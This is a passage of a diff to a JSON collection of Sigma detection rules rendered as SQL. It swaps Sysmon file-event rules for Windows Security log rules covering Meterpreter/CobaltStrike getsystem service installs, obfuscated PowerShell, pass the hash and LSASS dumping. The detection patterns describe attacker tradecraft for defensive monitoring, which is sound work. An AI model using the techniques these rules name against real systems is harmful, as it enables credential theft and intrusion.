+ "Highly unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%PROCEXP152.sys' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\procexp64.exe%' ESCAPE '\\' OR Image LIKE '%\\\\procexp.exe%' ESCAPE '\\' OR Image LIKE '%\\\\procmon64.exe%' ESCAPE '\\' OR Image LIKE '%\\\\procmon.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ((ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%cmd.exe%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%rundll32%' ESCAPE '\\' AND ServiceFileName LIKE '%.dll,a%' ESCAPE '\\' AND ServiceFileName LIKE '%/p:%' ESCAPE '\\')))" ], - "filename": "file_event_win_susp_procexplorer_driver_created_in_tmp_folder.yml" + "filename": "win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml" }, { - "title": "WerFault LSASS Process Memory Dump", - "id": "c3e76af5-4ce0-4a14-9c9a-25ceb8fda182", + "title": "Invoke-Obfuscation VAR+ Launcher - Security", + "id": "dcf2db1f-f091-425b-a821-c05875b8925a", "status": "experimental", - "description": "Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated use of Environment Variables to 
execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\WerFault.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\lsass%' ESCAPE '\\' OR TargetFilename LIKE '%lsass.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%\"set%' ESCAPE '\\' AND ServiceFileName LIKE '%-f%' ESCAPE '\\' AND (ServiceFileName LIKE '%/c%' ESCAPE '\\' OR ServiceFileName LIKE '%/r%' ESCAPE '\\'))" ], - "filename": "file_event_win_lsass_werfault_dump.yml" + "filename": "win_security_invoke_obfuscation_var_services_security.yml" }, { - "title": "Suspicious PFX File Creation", - "id": "dca1b3e8-e043-4ec8-85d7-867f334b5724", + "title": "Failed Logon From Public IP", + "id": "f88e112a-21aa-44bd-9b01-6ee2a2bbbed1", "status": "test", - "description": "A general detection for processes creating PFX files. This could be an indicator of an adversary exporting a local certificate to a PFX file.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "A login from a public IP can indicate a misconfigured firewall or network boundary.", + "author": "NVISO", "tags": [ - "attack.credential_access", - "attack.t1552.004" + "attack.initial_access", + "attack.persistence", + "attack.t1078", + "attack.t1190", + "attack.t1133" ], "falsepositives": [ - "System administrators managing certififcates." 
+ "Legitimate logon attempts over the internet", + "IPv4-to-IPv6 mapped IPs" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%.pfx' ESCAPE '\\' AND NOT ((TargetFilename LIKE '%\\\\Templates\\\\Windows\\\\Windows\\_TemporaryKey.pfx%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\CMake\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4625' AND NOT ((IpAddress LIKE '%-%' ESCAPE '\\') OR ((IpAddress LIKE '10.%' ESCAPE '\\' OR IpAddress LIKE '192.168.%' ESCAPE '\\' OR IpAddress LIKE '172.16.%' ESCAPE '\\' OR IpAddress LIKE '172.17.%' ESCAPE '\\' OR IpAddress LIKE '172.18.%' ESCAPE '\\' OR IpAddress LIKE '172.19.%' ESCAPE '\\' OR IpAddress LIKE '172.20.%' ESCAPE '\\' OR IpAddress LIKE '172.21.%' ESCAPE '\\' OR IpAddress LIKE '172.22.%' ESCAPE '\\' OR IpAddress LIKE '172.23.%' ESCAPE '\\' OR IpAddress LIKE '172.24.%' ESCAPE '\\' OR IpAddress LIKE '172.25.%' ESCAPE '\\' OR IpAddress LIKE '172.26.%' ESCAPE '\\' OR IpAddress LIKE '172.27.%' ESCAPE '\\' OR IpAddress LIKE '172.28.%' ESCAPE '\\' OR IpAddress LIKE '172.29.%' ESCAPE '\\' OR IpAddress LIKE '172.30.%' ESCAPE '\\' OR IpAddress LIKE '172.31.%' ESCAPE '\\' OR IpAddress LIKE '127.%' ESCAPE '\\' OR IpAddress LIKE '169.254.%' ESCAPE '\\')) OR (IpAddress = '::1' OR (IpAddress LIKE 'fe80::%' ESCAPE '\\' OR IpAddress LIKE 'fc00::%' ESCAPE '\\'))))" ], - "filename": "file_event_win_susp_pfx_file_creation.yml" + "filename": "win_security_susp_failed_logon_source.yml" }, { - "title": "Windows Webshell Creation", - "id": "39f1f9f2-9636-45de-98f6-a4046aa8e4b9", - "status": "test", - "description": "Possible webshell file creation on a static web site", - "author": "Beyu Denis, oscd.community, Tim Shelton", - "tags": [ - "attack.persistence", - "attack.t1505.003" - ], + "title": "Device Installation Blocked", + "id": "c9eb55c3-b468-40ab-9089-db2862e42137", + "status": "experimental", + 
"description": "Detects an installation of a device that is forbidden by the system policy", + "author": "frack113", "falsepositives": [ - "Legitimate administrator or developer creating legitimate executable files in a web application folder" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\inetpub\\\\wwwroot\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.asp%' ESCAPE '\\' OR TargetFilename LIKE '%.ashx%' ESCAPE '\\' OR TargetFilename LIKE '%.ph%' ESCAPE '\\')) OR ((TargetFilename LIKE '%\\\\www\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\htdocs\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\html\\\\%' ESCAPE '\\') AND TargetFilename LIKE '%.ph%' ESCAPE '\\')) AND NOT (((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')) OR (Image = 'System') OR (TargetFilename LIKE '%\\\\xampp%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '6423')" ], - "filename": "file_event_win_webshell_creation_detect.yml" + "filename": "win_security_device_installation_blocked.yml" }, { - "title": "Suspicious Outlook Macro Created", - "id": "117d3d3a-755c-4a61-b23e-9171146d094c", - "status": "test", - "description": "Detects the creation of a macro file for Outlook.", + "title": "Important Scheduled Task Deleted/Disabled", + "id": "7595ba94-cf3b-4471-aa03-4f6baa9e5fad", + "status": "experimental", + "description": "Detects when adversaries stop services or processes by deleting or disabling their respective scheduled tasks in order to conduct data destructive activities", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.execution", + "attack.privilege_escalation", "attack.persistence", - "attack.command_and_control", - "attack.t1137", - "attack.t1008", - "attack.t1546" + "attack.t1053.005" ], 
"falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%\\\\Microsoft\\\\Outlook\\\\VbaProject.OTM' ESCAPE '\\' AND NOT (Image LIKE '%\\\\outlook.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4699', '4701') AND (TaskName LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\Schedule%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\')) AND NOT ((EventID = '4699' AND SubjectUserName LIKE '%$' ESCAPE '\\' AND TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\')))" ], - "filename": "file_event_win_office_outlook_susp_macro_creation.yml" + "filename": "win_security_susp_scheduled_task_delete_or_disable.yml" }, { - "title": "Potential Persistence Attempt Via ErrorHandler.Cmd", - "id": "15904280-565c-4b73-9303-3291f964e7f9", - "status": "experimental", - "description": "Detects creation of a file named \"ErrorHandler.cmd\" in the \"C:\\WINDOWS\\Setup\\Scripts\\\" directory which could be used as a method of persistence\nThe content of C:\\WINDOWS\\Setup\\Scripts\\ErrorHandler.cmd is read whenever some tools under C:\\WINDOWS\\System32\\oobe\\ (e.g. 
Setup.exe) fail to run for any reason.\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "DCOM InternetExplorer.Application Iertutil DLL Hijack - Security", + "id": "c39f0c81-7348-4965-ab27-2fde35a1b641", + "status": "test", + "description": "Detects a threat actor creating a file named `iertutil.dll` in the `C:\\Program Files\\Internet Explorer\\` directory over the network for a DCOM InternetExplorer DLL Hijack scenario.", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", "tags": [ - "attack.persistence" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1021.003" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\WINDOWS\\\\Setup\\\\Scripts\\\\ErrorHandler.cmd' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND RelativeTargetName LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" ], - "filename": "file_event_win_persistence_error_handler_cmd.yml" + "filename": "win_security_dcom_iertutil_dll_hijack.yml" }, { - "title": "Creation In User Word Startup Folder", - "id": "a10a2c40-2c4d-49f8-b557-1a946bc55d9d", + "title": "SCM Database Handle Failure", + "id": "13addce7-47b2-4ca0-a98f-1de964d1d669", "status": "experimental", - "description": "Detects the creation of an file in user Word Startup", - "author": "frack113", + "description": "Detects non-system users failing to get a handle of the SCM database.", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.resource_development", - "attack.t1587.001" + "attack.discovery", + "attack.t1010" ], "falsepositives": [ - "Addition of legitimate plugins" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND 
TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Word\\\\STARTUP\\\\%' ESCAPE '\\' AND NOT ((TargetFilename LIKE '%.docx' ESCAPE '\\' OR TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.dotx' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.docb' ESCAPE '\\' OR TargetFilename LIKE '%.pdf' ESCAPE '\\' OR TargetFilename LIKE '%.wll' ESCAPE '\\' OR TargetFilename LIKE '%.wwl' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4656' AND ObjectType LIKE 'SC\\_MANAGER OBJECT' ESCAPE '\\' AND ObjectName = 'ServicesActive' AND AccessMask = '0xf003f') AND NOT (SubjectLogonId = '0x3e4'))" ], - "filename": "file_event_win_office_winword_startup.yml" + "filename": "win_security_scm_database_handle_failure.yml" }, { - "title": "Malicious DLL File Dropped in the Teams or OneDrive Folder", - "id": "1908fcc1-1b92-4272-8214-0fbaf2fa5163", + "title": "Password Protected ZIP File Opened (Email Attachment)", + "id": "571498c8-908e-40b4-910b-d2369159a3da", "status": "experimental", - "description": "Detects creation of a malicious DLL file in the location where the OneDrive or Team applications\nUpon execution of the Teams or OneDrive application, the dropped malicious DLL file (“iphlpapi.dll”) is sideloaded\n", - "author": "frack113", - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1574.002" - ], + "description": "Detects the extraction of password protected ZIP archives. 
See the filename variable for more details on which file has been opened.", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Unknown" + "Legitimate used of encrypted ZIP files" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%iphlpapi.dll%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5379' AND TargetName LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename%' ESCAPE '\\' AND TargetName LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook%' ESCAPE '\\')" ], - "filename": "file_event_win_iphlpapi_dll_sideloading.yml" + "filename": "win_security_susp_opened_encrypted_zip_outlook.yml" }, { - "title": "Suspicious ADSI-Cache Usage By Unknown Tool", - "id": "75bf09fa-1dd7-4d18-9af9-dd9e492562eb", + "title": "New or Renamed User Account with '$' in Attribute 'SamAccountName'", + "id": "cfeed607-6aa4-4bbd-9627-b637deb723c8", "status": "test", - "description": "Detects the usage of ADSI (LDAP) operations by tools. This may also detect tools like LDAPFragger.", - "author": "xknow @xknow_infosec, Tim Shelton", + "description": "Detects possible bypass EDR and SIEM via abnormal user account name.", + "author": "Ilyas Ochkov, oscd.community", "tags": [ - "attack.t1001.003", - "attack.command_and_control" + "attack.defense_evasion", + "attack.t1036" ], "falsepositives": [ - "Other legimate tools, which do ADSI (LDAP) operations, e.g. any remoting activity by MMC, Powershell, Windows etc." 
+ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\Local\\\\Microsoft\\\\Windows\\\\SchCache\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.sch' ESCAPE '\\') AND NOT (((Image LIKE 'C:\\\\windows\\\\system32\\\\svchost.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\windows\\\\system32\\\\dllhost.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\windows\\\\system32\\\\mmc.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\CCM\\\\CcmExec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Cylance\\\\Desktop\\\\CylanceSvc.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Windows\\\\ccmsetup\\\\autoupgrade\\\\ccmsetup%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\SentinelOne\\\\Sentinel Agent%' ESCAPE '\\')) OR (Image LIKE '%\\\\LANDesk\\\\LDCLient\\\\ldapwhoami.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Windows\\\\system32\\\\efsui.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\system32\\\\dsac.exe' ESCAPE '\\')) OR (Image LIKE '%:\\\\Program Files\\\\Citrix\\\\Receiver StoreFront\\\\Services\\\\DefaultDomainServices\\\\Citrix.DeliveryServices.DomainServices.ServiceHost.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4720' AND SamAccountName LIKE '%$%' ESCAPE '\\') OR (EventID = '4781' AND NewTargetUserName LIKE '%$%' ESCAPE '\\')))" ], - "filename": "file_event_win_susp_adsi_cache_usage.yml" + "filename": "win_security_new_or_renamed_user_account_with_dollar_sign.yml" }, { - "title": "Legitimate Application Dropped Script", - "id": "7d604714-e071-49ff-8726-edeb95a70679", - "status": "experimental", - "description": "Detects programs on a Windows system that should not write scripts to disk", - "author": "frack113, Florian Roth", + "title": "Malicious Service 
Installations", + "id": "cb062102-587e-4414-8efa-dbe3c7bf19c6", + "status": "test", + "description": "Detects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities.", + "author": "Florian Roth (Nextron Systems), Daniil Yugoslavskiy, oscd.community (update)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1003", + "car.2013-09-005", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR Image LIKE '%\\\\visio.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordview.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR Image LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR Image LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR Image LIKE '%\\\\finger.exe' ESCAPE '\\' OR Image LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR Image LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.scf' ESCAPE '\\' OR TargetFilename LIKE '%.wsf' ESCAPE '\\' OR TargetFilename LIKE '%.wsh' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceName = 'javamtsup')" ], - "filename": 
"file_event_win_legitimate_app_dropping_script.yml" + "filename": "win_security_mal_service_installs.yml" }, { - "title": "Office Macro File Download", - "id": "0e29e3a7-1ad8-40aa-b691-9f82ecd33d66", - "status": "experimental", - "description": "Detects the creation of a new office macro files on the systems via an application (browser, mail client).", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Windows Network Access Suspicious desktop.ini Action", + "id": "35bc7e28-ee6b-492f-ab04-da58fcf6402e", + "status": "test", + "description": "Detects unusual processes accessing desktop.ini remotely over network share, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.", + "author": "Tim Shelton (HAWK.IO)", "tags": [ - "attack.initial_access", - "attack.t1566.001" + "attack.persistence", + "attack.t1547.009" ], "falsepositives": [ - "Legitimate macro files downloaded from the internet", - "Legitimate macro files sent as attachemnts via emails" + "Read only access list authority" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\thunderbird.exe' ESCAPE '\\' OR Image LIKE '%\\\\HxOutlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\brave.exe' ESCAPE '\\' OR Image LIKE '%\\\\chrome.exe' ESCAPE '\\' OR Image LIKE '%\\\\firefox.exe' ESCAPE '\\' OR Image LIKE '%\\\\iexplorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\microsoftedgecp.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\opera.exe' ESCAPE '\\') AND ((TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.potm' ESCAPE '\\' OR TargetFilename LIKE '%.pptm' ESCAPE '\\') OR 
(TargetFilename LIKE '%.docm:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.dotm:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xltm:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.potm:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.pptm:Zone%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ObjectType = 'File' AND RelativeTargetName LIKE '%\\\\desktop.ini' ESCAPE '\\' AND (AccessList LIKE '%WriteData%' ESCAPE '\\' OR AccessList LIKE '%DELETE%' ESCAPE '\\' OR AccessList LIKE '%WriteDAC%' ESCAPE '\\' OR AccessList LIKE '%AppendData%' ESCAPE '\\' OR AccessList LIKE '%AddSubdirectory%' ESCAPE '\\'))" ], - "filename": "file_event_win_office_macro_files_downloaded.yml" + "filename": "win_security_net_share_obj_susp_desktop_ini.yml" }, { - "title": "Suspicious File Event With Teams Objects", - "id": "6902955a-01b7-432c-b32a-6f5f81d8f624", - "status": "experimental", - "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", - "author": "@SerkinValery", + "title": "Pass the Hash Activity 2", + "id": "8eef149c-bd26-49f2-9e5a-9b00e3af499b", + "status": "stable", + "description": "Detects the attack technique pass the hash which is used to move laterally inside the network", + "author": "Dave Kennedy, Jeff Warren (method) / David Vassallo (rule)", "tags": [ - "attack.credential_access", - "attack.t1528" + "attack.lateral_movement", + "attack.t1550.002" ], "falsepositives": [ - "Unknown" + "Administrator activity" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE 
(Channel = 'Security' AND ((EventID = '4624' AND SubjectUserSid = 'S-1-0-0' AND LogonType = '3' AND LogonProcessName = 'NtLmSsp' AND KeyLength = '0') OR (EventID = '4624' AND LogonType = '9' AND LogonProcessName = 'seclogo')) AND NOT (TargetUserName = 'ANONYMOUS LOGON'))" ], - "filename": "file_event_win_access_susp_teams.yml" + "filename": "win_security_pass_the_hash_2.yml" }, { - "title": "Office Macro File Creation From Suspicious Process", - "id": "b1c50487-1967-4315-a026-6491686d860e", - "status": "experimental", - "description": "Detects the creation of a office macro file from a a suspicious process", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "title": "Windows Pcap Drivers", + "id": "7b687634-ab20-11ea-bb37-0242ac130002", + "status": "test", + "description": "Detects Windows Pcap driver installation based on a list of associated .sys files.", + "author": "Cian Heasley", "tags": [ - "attack.initial_access", - "attack.t1566.001" + "attack.discovery", + "attack.credential_access", + "attack.t1040" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\')) AND (TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.potm' ESCAPE '\\' OR TargetFilename LIKE '%.pptm' ESCAPE '\\'))" + "SELECT * 
FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%pcap%' ESCAPE '\\' OR ServiceFileName LIKE '%npcap%' ESCAPE '\\' OR ServiceFileName LIKE '%npf%' ESCAPE '\\' OR ServiceFileName LIKE '%nm3%' ESCAPE '\\' OR ServiceFileName LIKE '%ndiscap%' ESCAPE '\\' OR ServiceFileName LIKE '%nmnt%' ESCAPE '\\' OR ServiceFileName LIKE '%windivert%' ESCAPE '\\' OR ServiceFileName LIKE '%USBPcap%' ESCAPE '\\' OR ServiceFileName LIKE '%pktmon%' ESCAPE '\\'))" ], - "filename": "file_event_win_office_macro_files_from_susp_process.yml" + "filename": "win_security_pcap_drivers.yml" }, { - "title": "Suspicious Get-Variable.exe Creation", - "id": "0c3fac91-5627-46e8-a6a8-a0d7b9b8ae1b", + "title": "Replay Attack Detected", + "id": "5a44727c-3b85-4713-8c44-4401d5499629", "status": "experimental", - "description": "Get-Variable is a valid PowerShell cmdlet\nWindowsApps is by default in the path where PowerShell is executed.\nSo when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet.\n", + "description": "Detects possible Kerberos Replay Attack on the domain controllers when \"KRB_AP_ERR_REPEAT\" Kerberos response is sent to the client", "author": "frack113", - "tags": [ - "attack.persistence", - "attack.t1546", - "attack.defense_evasion", - "attack.t1027" - ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%Local\\\\Microsoft\\\\WindowsApps\\\\Get-Variable.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4649')" ], - "filename": "file_event_win_susp_get_variable.yml" + "filename": "win_security_replay_attack_detected.yml" }, { - "title": "Files With System Process Name In Unsuspected Locations", - "id": 
"d5866ddf-ce8f-4aea-b28e-d96485a20d3d", + "title": "SysKey Registry Keys Access", + "id": "9a4ff3b8-6187-4fd2-8e8b-e0eae1129495", "status": "test", - "description": "Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64...etc).", - "author": "Sander Wiebing, Tim Shelton, Nasreddine Bencherchali", + "description": "Detects handle requests and access operations to specific registry keys to calculate the SysKey", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.defense_evasion", - "attack.t1036.005" + "attack.discovery", + "attack.t1012" ], "falsepositives": [ - "System processes copied outside their default folders for testing purposes", - "Third party software naming their software with the same names as the processes mentioned here" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\AtBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\audiodg.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\backgroundTaskHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cmdl32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\conhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\csrss.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dasHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dfrgui.exe' ESCAPE '\\' 